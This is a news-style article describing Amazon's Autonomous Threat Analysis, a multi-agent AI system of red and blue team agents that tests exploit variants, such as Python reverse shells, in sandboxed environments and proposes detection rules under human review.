As artificial intelligence speeds up software development in the tech industry, it is also changing the landscape of cyber offense and defense. Faster coding leads to more frequent releases, which means more opportunities for bugs, vulnerabilities, and overlooked security gaps. Meanwhile, attackers, from cybercriminals to state-sponsored groups, are increasingly using generative AI to automate reconnaissance, develop exploits, and carry out large-scale attacks.
To keep up with this shift, Amazon has embraced AI on a large scale. For the first time, the company is publicly sharing details about an internal system called Autonomous Threat Analysis (ATA). This multi-agent AI framework is designed to proactively find vulnerabilities in Amazon’s vast infrastructure before malicious actors do. Born out of an internal hackathon in August 2024, ATA has become a key security tool that combines AI creativity with human oversight.
A Multi-Agent System Born from a Hackathon
ATA did not come from a lengthy strategic plan. It started as a creative project during an Amazon hackathon, a setting where employees frequently pitch unconventional ideas.
One idea came from Amazon security engineer Michael Moran. He proposed a system where multiple specialized AI agents could replicate the roles of human red and blue teams. Instead of using a single, large AI model to simulate attacks and defenses, the plan focused on a competitive, team-based system, where agents could challenge and improve each other’s work.
The idea quickly gained popularity.
“The initial concept aimed to address a critical limitation in security testing: limited coverage and the challenge of keeping detection capabilities current,” Steve Schmidt, Chief Security Officer at Amazon, explained.
The size of Amazon’s ecosystem—thousands of applications, millions of lines of code, and production environments around the world—makes thorough manual analysis impossible. Schmidt noted that even with a strong security team, human reviewers alone cannot check or test every potential weakness in time.
This lack of coverage was exactly what ATA aimed to fix.
Why Amazon Needed an Automated Threat Engine
Tech companies today face a dual threat:
- Exponential growth in software
- Fast development cycles create more code than traditional security teams can vet.
AI-enhanced attackers
Malicious actors now use generative AI to create advanced phishing campaigns, develop malware variants, and automate exploit testing.
Amazon understood that its defensive measures, while substantial, risked falling behind the fast-paced threat landscape. ATA was created to change that.
ATA’s Core: Specialized AI Agents Working in Teams
Unlike traditional security tools, ATA uses multiple AI agents, each with a specific role, working together in coordinated teams. These agents simulate both offensive and defensive strategies in a controlled, realistic environment tailored to Amazon’s actual systems.
Red Team Agents
These agents function as attackers. They:
- Explore possible exploits
- Test real commands in sandboxed, production-like systems
- Generate new attack techniques
- Produce logs showing how exploits work in practice
Blue Team Agents
These agents focus on defense. They:
- Analyze real telemetry from attacks
- Suggest new detection rules
- Recommend remediation actions
- Confirm whether protections successfully block threats
Both sides operate in real, verifiable environments rather than hypothetical simulations.
High-Fidelity Testing Environments: ATA’s Secret Weapon
As Amazon scaled ATA, one of its major investments was developing high-fidelity test systems—environments so realistic that AI agents can engage with them as if they were Amazon’s actual production infrastructure.
These environments:
- Generate real system telemetry
- Provide accurate logs and execution traces
- Allow AI agents to mimic real-world operations without risking live systems
This “sandbox realism” makes ATA exceptionally effective. Instead of just theorizing about how an attack might function, agents carry out actual commands and observe the genuine results.
Designed Against Hallucinations
One major concern with generative AI, especially in critical areas like cybersecurity, is hallucination, or fabricating details without evidence.
Amazon claims ATA avoids this through its design, rather than relying on correction afterward.
ATA requires:
- Timestamped logs
- Observable telemetry
- Reproducible results
No claim from an agent is accepted unless it is verified by actual system evidence.
This strict guideline aims to completely eliminate hallucinations.
“Because the system demands observable evidence, hallucinations are architecturally impossible,” Steve Schmidt said.
While many AI tools struggle to produce reliable, accurate outputs, ATA’s “evidence first” approach sets it apart.
Machine-Speed Security: AI Agents Generate and Patch Variants Instantly
Where human security researchers might investigate one exploit at a time, ATA’s agents can create hundreds of variants in just minutes.
Michael Moran explains, “I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding… It enables everything to run at machine speed.”
This allows for:
- More creative attack paths explored
- Quicker detection of variant vulnerabilities
- Faster review cycles
- Rapid iteration between red and blue teams
The system acts as a force multiplier, allowing human experts to focus on complex analysis instead of repetitive or time-consuming tasks.
Real-World Example: Reverse Shell Defense Breakthrough
One of ATA’s early successes involved analyzing Python-based reverse shell techniques—a common method hackers use to gain remote control of a device.
Within hours, the system:
- Identified obscure variations of reverse shell methods
- Generated new attack chains
- Suggested detection and remediation rules
- Verified the effectiveness of those protections in real environments
The result: Amazon’s defenses achieved a 100% detection rate for the tested variants.
This level of coverage would have taken humans days or even weeks to replicate.
Human in the Loop: AI Generates, Humans Govern
Despite its independence, ATA does not operate on its own in production.
Every detection rule, every remediation suggestion, and every proposed system change must go through human review. Amazon refers to this as “human in the loop,” which ensures transparency and accountability.
Schmidt emphasizes that ATA is not a replacement for human red teams or experienced analysts:
“ATA is not a substitute for advanced, nuanced human security testing. But it takes on the mundane tasks so humans can focus on the complex problems.”
The objective is to remove tedious work—not expertise.
The Next Phase: Real-Time Incident Response
So far, ATA has mainly been used as a proactive tool—searching for weaknesses, identifying exploit variations, and strengthening defenses.
However, Amazon’s security leaders believe the future lies in using ATA during active incidents.
In real-time scenarios, ATA could:
- Identify patterns in attack telemetry
- Suggest immediate containment strategies
- Generate detection rules within minutes
- Assist responders as threats develop
This could significantly shorten the time between detection and remediation—a critical factor during large-scale attacks.
Reducing Alert Fatigue for Human Analysts
Security teams across the industry struggle with false positives, which consume time and attention. ATA alleviates this burden by verifying findings with actual system data before passing them to humans.
As a result, Amazon’s analysts spend less time sorting through noise and more on investigating real, credible threats.
Schmidt sums up the value:
“AI does the grunt work. When our team is freed from analyzing false positives, they can focus on real threats.”
A New Model for AI-Driven Cybersecurity
Amazon’s ATA reflects a broader trend that is reshaping cybersecurity:
AI attackers are getting stronger; AI defenders must evolve.
Manual testing alone can’t keep up; automated variant generation is crucial.
Security must be continuous and evidence-based; hallucination-free AI is a necessity, not a luxury.
While other tech giants experiment with AI security tools, Amazon’s multi-agent and adversarial-team approach stands out as one of the most ambitious efforts to date.
With ATA, Amazon is not just automating tests; it is replicating the dynamics of human red and blue teams at machine speed.
For a company with one of the largest digital footprints globally, this capability may soon prove essential.